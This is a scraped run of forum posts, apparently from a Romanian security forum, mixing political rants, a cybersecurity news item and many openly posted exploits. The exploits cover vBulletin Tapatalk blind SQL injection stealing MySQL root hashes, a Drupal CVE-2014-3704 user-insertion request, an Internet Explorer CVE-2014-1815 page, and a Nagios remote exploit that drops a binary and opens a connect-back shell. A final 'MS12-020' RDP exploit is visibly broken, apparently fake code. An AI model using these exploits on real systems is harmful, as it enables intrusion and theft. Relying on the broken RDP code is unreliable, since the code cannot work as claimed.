Nytro

Hacking Oracle from the Web This paper discusses the exploitation techniques available for exploiting SQL Injection from web applications against the Oracle database. Most of the techniques available over the Internet are based on exploitation when attacker has interactive access to the Oracle database, i.e. he can connect to the database via a SQL client. While some of these techniques can be directly applied when exploiting SQL injection in web applications, this is not always true. Unlike MS-*?SQL, Oracle neither supports nested queries, nor has any direct functionality like xp_cmdshell to allow execution of operating system commands. Extraction of sensitive data from a back-*?end database by exploiting SQL injection in Oracle web applications is well known. Performing privilege escalation and executing operating system commands from web applications is not widely known, and is the subject of this paper. Download: http://7safe.com/assets/pdfs/Hacking_Oracle_From_Web_2.pdf

Daca te interesai, aflai ca le are de dinainte de a intra in politica. Si daca vedeai poze iti dadeai seama ca nu sunt "vile". Problema pe care o vad eu la el e urmatoarea: si el ofera "plase cu de toate" babutelor pe la tara ca sa il voteze. Deci MUIE.

Votati.

[h=1]O nou? meserie în România: specialist în securitate cibernetic?[/h]de Liviu Iancu - Mediafax O nou? meserie va ap?rea în România, de specialist în domeniul securit??ii cibernetice, iar în prezent se lucreaz? la fi?a postului, urmând s? fie introdus? în codul ocupa?ional ?i s? i se stabileasc? standarde salariale, a declarat miercuri Sorin Encu?escu, consilier de stat al primului-ministru. "Preocuparea noastr? în acest moment este aceea ca institu?iile s? aib? oameni specializa?i care s? poat? s? lucreze cât se poate de calificat în acest domeniu. De aceea, odat? cu dezvoltarea sistemului de atribu?ii institu?ionale, în momentul de fa?? se lucreaz? inclusiv la fi?a posturilor pe care urmeaz? s? fie încadrate, în a?a fel încât s? putem fi în m?sur? s? cre?m în România ?i s? punem în codul ocupa?ional func?ia de specialist în domeniul securit??ii cibernetice. Aceast? nou? meserie trebuie recunoscut? ?i trebuie introdus? în codul ocupa?ional român, de unde inclusiv putem stabili standarde de salarizare", a spus Encu?escu la un seminar organizat de grupul UTI. El a ar?tat c? în strategia industriei na?ionale de securitate a fost introdus? o nou? component?, cea a dezvolt?rii ?i sus?inerii operatorilor economici publici ?i cei de stat, care î?i desf??oar? activitatea în domeniul securit??ii cibernetice. "Practic, în acest moment, exist? în con?inutul strategiei, o component? care se refer? la încurajarea întreprinderilor mici ?i mijlocii ?i a start-up-urilor în domeniul securit??ii cibernetice. Sprijinim ?i încuraj?m crearea de astfel de companii", a ad?ugat Encu?escu. Consilierul a men?ionat c? statul inten?ioneaz? s? acorde facilit??i fiscale companiilor care investesc în securitatea cibernetic?. Teodor Cimpoe?u, director la compania de securitate cibernetic? certSIGN din cadrul UTI, a declarat c? în România atacurile cibernetice nu sunt f?cute doar de români, ci ?i de c?tre str?ini. "Este o amenin?are, pe de o parte, pentru utilizatorul individual, care st? pe internet, de la simplul fapt c? îi sunt furate datele de login ?i conturile de re?ele sociale, pân? la a-i fi furate datele bancare sau chiar banii din cont. La companii este mai grav, pentru c? le pot fi afectate structurile informatice cu care î?i desf??oar? activitatea", a mai spus Cimpoe?u. Sursa: O nou? meserie în România: specialist în securitate cibernetic? - Mediafax

[h=1]vBulletin Tapatalk - Blind SQL Injection[/h] #!/usr/bin/env python# -*- coding: utf-8 -*- ''' @author: tintinweb 0x721427D8 ''' import urllib2, urllib import xmlrpclib,re, urllib2,string,itertools,time from distutils.version import LooseVersion class Exploit(object): def __init__(self, target, debug=0 ): self.stopwatch_start=time.time() self.target = target self.path = target self.debug=debug if not self.target.endswith("mobiquo.php"): self.path = self.detect_tapatalk() if not self.path: raise Exception("Could not detect tapatalk or version not supported!") self.rpc_connect() self.attack_func = self.attack_2 def detect_tapatalk(self): # request page, check for tapatalk banner handlers = [ urllib2.HTTPHandler(debuglevel=self.debug), urllib2.HTTPSHandler(debuglevel=self.debug), ] ua = urllib2.build_opener(*handlers) ua.addheaders = [('User-agent', 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3')] data = ua.open(self.target).read() if self.debug: print data if not "tapatalkDetect()" in data: print "[xx] could not detect tapatalk. bye..." return None # extract tapatalk version print "[ i] Taptalk detected ... ", path = "".join(re.findall(r"^\s*<link href=[\s'\"]?(http://.*?/)smartbanner/appbanner.css", data, re.MULTILINE|re.DOTALL)) path+="mobiquo.php" print "'%s' ... "%path, data = urllib.urlopen(path).read() version = "".join(re.findall(r"Current Tapatalk plugin version:\s*([\d\.a-zA-Z]+)", data)) if LooseVersion(version) <= LooseVersion("5.2.1"): print "v.%s - OK"%version return path print "v.%s - not vulnerable"%version return None def rpc_connect(self): self.rpc = xmlrpclib.ServerProxy(self.path,verbose=self.debug) def attack_1(self, sqli, sleep=2): ''' SELECT subscribethreadid FROM subscribethread AS subscribethread LEFT JOIN user AS user ON (user.userid=subscribeforum.userid) WHERE subscribethreadid = <INJECTION> AND subscribethreadid.userid = 0"; <INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE ''' query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep) query += "union select subscribethreadid from subscribethread where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0" if self.debug: print """ SELECT subscribethreadid FROM subscribethread AS subscribethread LEFT JOIN user AS user ON (user.userid=subscribethread.userid) WHERE subscribethreadid = %s AND subscribethread.userid = 0"""%query return self.rpc.unsubscribe_topic("s_%s"%query) #no escape, invalid_char="_" def attack_2(self, sqli, sleep=2): ''' SELECT subscribeforumid FROM subscribeforum AS subscribeforum LEFT JOIN user AS user ON (user.userid=subscribeforum.userid) WHERE subscribeforumid = <INJECTION> AND subscribeforum.userid = 0"; <INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE ''' query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep) query += "union select subscribeforumid from subscribeforum where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0" if self.debug: print """ SELECT subscribeforumid FROM subscribeforum AS subscribeforum LEFT JOIN user AS user ON (user.userid=subscribeforum.userid) WHERE subscribeforumid = %s AND subscribeforum.userid = 0"""%query return self.rpc.unsubscribe_forum("s_%s"%query) #no escape, invalid_char="_" def attack_blind(self,sqli,sleep=2): return self.attack_func(sqli,sleep=sleep) #return self.attack_func("-1 OR subscribethreadid = ( %s AND (select sleep(4)) ) UNION SELECT 'aaa' FROM subscribethread WHERE subscribethreadid = -1 OR 1 "%sqli) def attack_blind_guess(self,query, column, charset=string.ascii_letters+string.digits,maxlength=32, sleep=2, case=True): ''' provide <query> = select -1 from user where user='debian-sys-maint' where <COLUMN> <GUESS> ''' hit = False # PHASE 1 - guess entry length print "[ ] trying to guess length ..." for guess_length in xrange(maxlength+1): q = query.replace("<COLUMN>","length(%s)"%column).replace("<GUESS>","= %s"%guess_length) self.stopwatch() self.attack_blind(q, sleep) duration = self.stopwatch() print ".", if duration >= sleep-sleep/8: # HIT! - got length! => guess_length hit = True print "" break if not hit: print "[ !!] unable to guess password length, check query!" return None print "[ *] LENGTH = %s"%guess_length # PHASE 2 - guess password up to length print "[ ] trying to guess value ..." hits = 0 result = "" for pos in xrange(guess_length): # for each char pos in up to guessed length for attempt in self.bruteforce(charset, 1): # probe all chars in charset #attempt = re.escape(attempt) if attempt == "%%": attempt= "\%" #LIKE binary = case sensitive.might be better to do caseinsensitive search + recheck case with binary q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE '%s%s%%' "%(result,attempt)) self.stopwatch() self.attack_blind(q, sleep) duration = self.stopwatch() #print result,attempt," ",duration print ".", if duration >= sleep-sleep/8: if case: # case insensitive hit - recheck case: this is drastically reducing queries needed. q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE binary '%s%s%%' "%(result,attempt.lower())) self.stopwatch() self.attack_blind(q, sleep) duration = self.stopwatch() if duration >= sleep-sleep/8: attempt = attempt.lower() else: attempt = attempt.upper() # case sensitive - end # HIT! - got length! => guess_length hits += 1 print "" print "[ +] HIT! - %s[%s].."%(result,attempt) result += attempt break if not hits==guess_length: print "[ !!] unable to guess password length, check query!" return None print "[ *] SUCCESS!: query: %s"%(query.replace("<COLUMN>",column).replace("<GUESS>","='%s'"%result)) return result def bruteforce(self, charset, maxlength): return (''.join(candidate) for candidate in itertools.chain.from_iterable(itertools.product(charset, repeat=i) for i in range(1, maxlength + 1))) def stopwatch(self): stop = time.time() diff = stop - self.stopwatch_start self.stopwatch_start=stop return diff if __name__=="__main__": #googledork: https://www.google.at/search?q=Tapatalk+Banner+head+start DEBUG = False TARGET = "http://TARGET/vbb4/forum.php" x = Exploit(TARGET,debug=DEBUG) print "[ ] TAPATALK for vBulletin 4.x - SQLi" print "[--] Target: %s"%TARGET if DEBUG: print "[--] DEBUG-Mode!" print "[ +] Attack - sqli" query = u"-1 UNION SELECT 1%s"%unichr(0) if DEBUG: print u""" SELECT subscribeforumid FROM subscribeforum AS subscribeforum LEFT JOIN user AS user ON (user.userid=subscribeforum.userid) WHERE subscribeforumid = %s AND subscribeforum.userid = 0"""%query print "[ *] guess mysql user/pass" print x.attack_blind_guess("select -1 from mysql.user where user='root' and <COLUMN> <GUESS>", column="password", charset="*"+string.hexdigits, maxlength=45) # usually 40 chars + 1 print "[ *] guess apikey" print x.attack_blind_guess("select -1 from setting where varname='apikey' and <COLUMN> <GUESS>", column='value', charset=string.ascii_letters+string.digits, maxlength=14, ) print "-- done --" Sursa: vBulletin Tapatalk - Blind SQL Injection

O sa ma bag si eu daca se mai ofera 2 persoane.

FindWindow, FindWindowEx, GetWindowRect. Sunt multe functii de Windows pe care le poti folosi: Window Functions (Windows) Nu stiu insa ce iti ofera AutoIT-ul.

[h=1]Drupal CVE-2014-3704 insert new user[/h] POST /drupal/?q=node&destination=node HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: 192.168.88.88 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2a1pre) Gecko Content-Type: application/x-www-form-urlencoded Content-Length: 258 name[0%20;insert+into+users+%28uid%2cname%2cpass%2cstatus%29+values+%28123456%2c'greenbull'%2c'$S$DkH0O9Lpt5i1oUi9yYeouLW0ZCAHo/u75ReE1zjCPaPbZoVZQX/m'%2c1%29;;#%20%20]=nTzlWXKY&name[0]=ptSHbjbW&pass=o81NgWxc&form_build_id=&form_id=user_login_block&op=Log+in

Puteti folosi categoria "Free stuff" daca doriti sa oferiti ceva. Oferiti cui doriti, pe ce criterii doriti. Bafta!

Whoa: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4182969-security-patch-release-for-vbulletin-connect-5-0-0-5-1-4

Whoa: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4183258-security-exploit-fixed-in-vbulletin-4-2-2-and-4-2-3

MUIE PONTA.

Vreau sa vad 20-30 de lucruri pe care le donati inainte de a va da cu parerea.

Vineri e Owasp. Ne vedem acolo.

Sunt cateva chestii utile, dar nu e cine stie ce. Forumuri interesante mai sunt: opensc, trojanforge, rohitab, tuts4you, kernelmode si multe altele. Si reversing.ro al lui @giv .

CCleaner Pro Patching Tut by Kjacky Home Page: http://www.piriform.com/ Tutorial: CCP Sursa: EXETOOLS FORUM

CVE-2014-1815 Html code - Internet Explorer 6-11 CVE-2014-1815 Html code 1: < !doctype html> 2: < html> 3: < head> 4: < meta http-equiv="Cache-Control" content="no-cache"/> 5: < sc?ript > 6: func?tion stc() 7: { 8: var Then = new Date(); 9: Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 ); 10: document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString(); 11: } 12: func?tion cid() 13: { 14: var swf = 0; 15: try { 16: swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) { 17: } 18: if (!swf) 19: return 0; 20: var cookieString = new String(document.cookie); 21: if(cookieString.indexOf("d93kaj3Nja3") == -1) 22: {stc(); return 1;}else{ return 0;} 23: } 24: String.prototype.repeat=func?tion (i){return new Array(isNaN(i)?1:++i).join(this);} 25: var tpx=un?escape ("%u1414%u1414").repeat(0x60/4-1); 26: var ll=new Array(); 27: for (i=0;i< 3333;i++)ll.push(document.create?Element("img")); 28: for(i=0;i< 3333;i++) ll[i].className=tpx; 29: for(i=0;i< 3333;i++) ll[i].className=""; 30: CollectGarbage(); 31: func?tion b2() 32: { 33: try{xdd.re?placeNode(document.createTextNode(" "));}catch(exception){} 34: try{xdd.outerText='';}catch(exception){} 35: CollectGarbage(); 36: for(i=0;i< 3333;i++) ll[i].className=tpx; 37: } 38: func?tion a1(){ 39: if (!cid()) 40: return; 41: document.body.contentEditable="true"; 42: try{xdd.applyElement(document.create?Element("frameset"));}catch(exception){} 43: try{document.selection.createRange().select();}catch(exception){} 44: } 45: < / sc?ript > 46: < /head> 47: < body onload='setTimeout("a1();",2000);' onresize=b2()> 48: < marquee id=xdd > < /marquee> 49: < object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE"> 50: < param name="movie" value="storm.swf" /> 51: < param name="quality" value="high" /> 52: < param name="bgcolor" value="#ffffff" /> 53: < param name="allowScriptAccess" value="sameDomain" /> 54: < param name="allowFullScreen" value="true" /> 55: < /object> 56: < /body> 57: < body> 58: < form name=loading> 59: ¡¡< p align=center> < font color="#0066ff" size="2"> Loading....,Please Wait< /font> < font color="#0066ff" size="2" face="verdana"> ...< /font> 60: ¡¡¡¡< input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;"> 61: ¡¡¡¡ 62: ¡¡¡¡< input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;"> 63: ¡¡¡¡< sc?ript > ¡¡ 64: var bar=0¡¡ 65: var line="||"¡¡ 66: var amount="||"¡¡ 67: count()¡¡ 68: func?tion count(){¡¡ 69: bar=bar+2¡¡ 70: amount =amount + line¡¡ 71: document.loading.chart.value=amount¡¡ 72: document.loading.percent.value=bar+"%"¡¡ 73: if (bar< 99)¡¡ 74: {setTimeout("count()",500);}¡¡ 75: else¡¡ 76: {window.location = "http://www.google.com.hk";}¡¡ 77: }< / sc?ript > 78: ¡¡< /p> 79: < /form> 80: < p align="center"> Wart,< a style="text-decoration: none" href="http://www.google.com.hk"> < font color="#FF0000"> kick me< /font> < /a> .< /p> 81: < /body> 82: < /html> Sursa: CVE-2014-1815 Html code - Pastebin.com

CVE-2012-6096 - Nagios history.cgi Remote Command Execution #!/usr/bin/python # # CVE-2012-6096 - Nagios history.cgi Remote Command Execution # =========================================================== # Another year, another reincarnation of classic and trivial # bugs to exploit. This time we attack Nagios.. or more # specifically, one of its CGI scripts. [1] # # The Nagios code is an amazing monster. It reminds me a # lot of some of my early experiments in C, back when I # still had no clue what I was doing. (Ok, fair enough, # I still don't, heheh.) # # Ok, I'll come clean. This exploit doesn't exactly # defeat FORTIFY. This approach is likely to work just FINE # on other crippled distro's though, think of stuff like # ArchLinux, Slackware, and all those Gentoo kids twiddling # their CFLAGS. [2] (Oh and hey, BSD and stuff!) # # I do some very stupid shit(tm) here that might make an # exploit coder or two cringe. My sincere apologies for that. # # Cold beer goes out to my friends who are still practicing # this dying but interesting type of art: # # * brainsmoke * masc * iZsh * skier_ * steve * # # -- blasty <blasty@fail0verflow.com> / 2013-01-08 # # References: # [1] http://permalink.gmane.org/gmane.comp.security.oss.general/9109 # [2] http://www.funroll-loops.info/ # # P.S. To the clown who rebranded my Samba exploit: j00 s0 1337 m4n! # Next time you rebrand an exploit at least show some diligence and # add some additional targets or improvements, so we can all profit! # # P.P.S. hey, Im not _burning_ bugs .. this is a 2day, enjoy! # import os, sys, socket, struct, urllib, threading, SocketServer, time from base64 import b64encode SocketServer.TCPServer.allow_reuse_address = True targets = [ { "name" : "Debian (nagios3_3.0.6-4~lenny2_i386.deb)", "smash_len" : 0xc37, "unescape" : 0x0804b620, "popret" : 0x08048fe4, "hostbuf" : 0x080727a0, "system_plt" : 0x08048c7c } ] def u32h(v): return struct.pack("<L", v).encode('hex') def u32(v, hex = False): return struct.pack("<L", v) # Tiny ELF stub based on: # http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html def make_elf(sc): elf_head = \ "7f454c46010101000000000000000000" + \ "02000300010000005480040834000000" + \ "00000000000000003400200001000000" + \ "00000000010000000000000000800408" + \ "00800408" + u32h(0x54+len(sc))*2 + \ "0500000000100000" return elf_head.decode("hex") + sc # interactive connectback listener class connectback_shell(SocketServer.BaseRequestHandler): def handle(self): print "\n[!!] K4P0W!@# -> shell from %s" % self.client_address[0] print "[**] This shell is powered by insane amounts of illegal substances" s = self.request import termios, tty, select, os old_settings = termios.tcgetattr(0) try: tty.setcbreak(0) c = True os.write(s.fileno(), "id\nuname -a\n") while c: for i in select.select([0, s.fileno()], [], [], 0)[0]: c = os.read(i, 1024) if c: if i == 0: os.write(1, c) os.write(s.fileno() if i == 0 else 1, c) except KeyboardInterrupt: pass finally: termios.tcsetattr(0, termios.TCSADRAIN, old_settings) return class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass if len(sys.argv) != 5: print "\n >> Nagios 3.x CGI remote code execution by <blasty@fail0verflow.com>" print " >> \"Jetzt geht's Nagi-los!\"\n" print " usage: %s <base_uri> <myip> <myport> <target>\n" % (sys.argv[0]) print " targets:" i = 0 for target in targets: print " %02d) %s" % (i, target['name']) i = i+1 print "" sys.exit(-1) target_no = int(sys.argv[4]) if target_no < 0 or target_no > len(targets): print "Invalid target specified" sys.exit(-1) target = targets[ int(sys.argv[4]) ] # comment this shit if you want to setup your own listener server = ThreadedTCPServer((sys.argv[2], int(sys.argv[3])), connectback_shell) server_thread = threading.Thread(target=server.serve_forever) server_thread.daemon = True server_thread.start() # shellcode to be executed # vanilla x86/linux connectback written by a dutch gentleman # close to a decade ago. cback = \ "31c031db31c951b10651b10151b10251" + \ "89e1b301b066cd8089c231c031c95151" + \ "68badc0ded6668b0efb102665189e7b3" + \ "1053575289e1b303b066cd8031c939c1" + \ "740631c0b001cd8031c0b03f89d3cd80" + \ "31c0b03f89d3b101cd8031c0b03f89d3" + \ "b102cd8031c031d250686e2f7368682f" + \ "2f626989e3505389e1b00bcd8031c0b0" + \ "01cd80" cback = cback.replace("badc0ded", socket.inet_aton(sys.argv[2]).encode("hex")) cback = cback.replace("b0ef", struct.pack(">H", int(sys.argv[3])).encode("hex")) # Eww.. so there's some characters that dont survive the trip.. # yes, even with the unescape() call in our return-chain.. # initially I was going to use some /dev/tcp based connectback.. # but /dev/tcp isn't available/accesible everywhere, so instead # we drop an ELF into /tmp and execute that. The '>' characters # also doesn't survive the trip so we work around this by using # the tee(1) utility. # If your target has a /tmp that is mounted with noexec flag, # is severely firewalled or guarded by trained (watch)dogs.. # you might want to reconsider this approach! cmd = \ "rm -rf /tmp/x;" + \ "echo " + b64encode(make_elf(cback.decode('hex'))) + "|" + \ "base64 -d|tee /tmp/x|chmod +x /tmp/x;/tmp/x;" # Spaces (0x20) are also a problem, they always ends up as '+' # so apply some olde trick and rely on $IFS for argv separation cmd = cmd.replace(" ", "${IFS}") # Basic return-2-whatever/ROP chain. # We return into cgi_input_unescape() to get rid of # URL escaping in a static buffer we control, and then # we return into system@plt for the moneyshot. # # Ergo sum: # There's no memoryleak or whatever needed to leak libc # base and bypass ASLR.. This entire Nagios PoS is stringed # together by system() calls, so pretty much every single one # of their little silly binaries comes with a PLT entry for # system(), huzzah! rop = [ u32(target['unescape']), u32(target['popret']), u32(target['hostbuf']), u32(target['system_plt']), u32(0xdeafbabe), u32(target['hostbuf']) ] # Yes.. urllib, so it supports HTTPS, basic-auth and whatnot # out of the box. Building HTTP requests from scratch is so 90ies.. params = urllib.urlencode({ 'host' : cmd + "A"*(target['smash_len']-len(cmd)) + "".join(rop) }) print "[>>] CL1Q .." f = urllib.urlopen(sys.argv[1]+"/cgi-bin/history.cgi?%s" % params) print "[>>] CL4Q .." f.read() # TRIAL PERIOD ACTIVE, LOL! time.sleep(0x666) server.shutdown() Sursa: [Python] CVE-2012-6096 exploit - Pastebin.com

CVE-2012-0002 - Remote Desktop Protocol (RDP) #!/usr/bin/env python ############################################################################# # MS12-020 Exploit by Sabu # sabu@fbi.gov # Uses FreeRDP ############################################################################# import struct import sys from freerdp import rdpRdp from freerdp import crypto from freerdp.rdpRdp import rdpNego #bind shellcode TCP port 4444 shellcode = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90' shellcode += '\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9' shellcode += '\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56' shellcode += '\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22' shellcode += '\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30' shellcode += '\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81' shellcode += '\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42' shellcode += '\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22' shellcode += '\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9' shellcode += '\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79' shellcode += '\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab' shellcode += '\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa' shellcode += '\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48' shellcode += '\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1' shellcode += '\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0' shellcode += '\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe' shellcode += '\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9' shellcode += '\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84' shellcode += '\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56' shellcode += '\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8' shellcode += '\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79' shellcode += '\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6' shellcode += '\xba\xb5\x60\x56\x39\x4a\xb6\xa9' #Payload payload = '\x41\x00\x5c\x00' payload += '\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49' payload += '\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68' payload += '\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32' payload += '\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43' payload += '\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71' payload += '\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c' payload += '\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74' payload += '\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66' payload += '\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c' payload += '\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b' payload += '\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79' payload += '\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54' payload += '\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36' payload += '\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30' payload += '\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66' payload += '\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73' payload += '\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b' payload += '\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63' payload += '\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a' payload += '\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f' payload += '\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73' payload += '\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c' payload += '\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70' payload += '\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61' payload += '\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33' payload += '\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32' payload += '\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e' payload += '\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39' payload += '\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39' payload += '\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e' payload += '\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e' payload += '\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51' payload += '\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64' payload += '\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37' payload += '\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70' payload += '\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e' payload += '\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73' payload += '\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61' payload += '\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78' payload += '\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e' payload += '\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30' payload += '\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b' payload += '\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b' payload += '\x4f\x69\x46\x4b\x4f\x6e\x30\x68'; class SRVSVC_Exploit(Thread): def __init__(self, target, port=3389): super(SRVSVC_Exploit, self).__init__() self.__port = port self.target = target def __DCEPacket(self): print '[-]Connecting' self.__trans = rdp.transport.cert('rdp_np:%s\\x00\\x89]' % self.target) self.__trans.connect() print '[-]connected' % self.target # Making teh packet self.__stub='\x01\x00\x00\x00' self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00' self.__stub+=shellcode self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub+='\x00\x00\x00\x00' self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00' self.__stub+=payload self.__stub+='\x00\x00\x00\x00' self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00' self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00' self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00' self.__stub+='\x01\x00\x00\x00\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3' return def run(self): self.__DCEPacket() 